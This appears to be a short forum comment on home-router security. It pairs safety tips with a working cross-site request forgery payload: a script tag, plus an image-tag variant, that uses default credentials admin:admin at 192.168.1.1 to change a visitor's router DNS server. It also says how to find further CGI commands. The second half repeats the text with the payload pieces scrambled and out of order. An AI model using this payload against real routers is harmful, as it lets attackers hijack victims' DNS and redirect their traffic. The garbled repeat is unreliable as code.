In order to be safe,
1. you should logout after changing the password or (if no logout is possible, such as with simple HTTP authentication) restart your browser before visiting any webpage.
2. Do not tick the "memorize password" box. If you do this, an intruder could manipulate the router without a password.
Try the following:
Make a web page that includes
<script src =
"http://admin:admin@192.168.1.1/wan_poe.cgi?dns1=2 04.101.251.1">
</script>
If you have the same router as I have, you will have entered a new DNS. No Java, no Javascript, just plain HTML.
View the source of the configuration page of your router to find out what cgi commands you need for this.
Slashdot Mirror
The offending command is not necessary a script command, it could be:
<img src="admin:admin@192.168.1.1/something.cgi>
NoScript would not help here.
By the way, it seems that Macintosh users cannot use NoScript
In order to be safe, 1. you should logout after changing the password or (if no logout is possible, such as with simple HTTP authentication) restart your browser before visiting any webpage. 2. Do not tick the "memorize password" box. If you do this, an intruder could manipulate the router without a password.
Try the following: Make a web page that includes2 04.101.251.1">
</script>
<script src = "http://admin:admin@192.168.1.1/wan_poe.cgi?dns1=
If you have the same router as I have, you will have entered a new DNS. No Java, no Javascript, just plain HTML. View the source of the configuration page of your router to find out what cgi commands you need for this.